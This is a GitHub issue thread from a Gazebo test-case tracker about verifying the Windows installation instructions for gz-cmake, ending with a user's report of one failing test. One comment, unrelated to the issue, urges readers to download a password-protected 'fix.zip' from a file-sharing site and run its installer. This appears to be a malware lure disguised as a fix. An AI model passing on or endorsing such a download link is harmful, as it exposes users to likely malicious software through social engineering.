gazebosim/gazebo_test_cases #1090: gz-cmake: Installation

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/cmake/4/install.html)
* [Source](https://github.com/gazebosim/gz-cmake/tree/gz-cmake4/tutorials/install.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Roboticistprogrammer, 2024-09-09:
Hi there, I have source installed the package and use "make test" to run all the tests, all passed except No.41(core_child_requires_core_nodep)
[image]
[image]
[image]

closed 2025-08-27 by azeey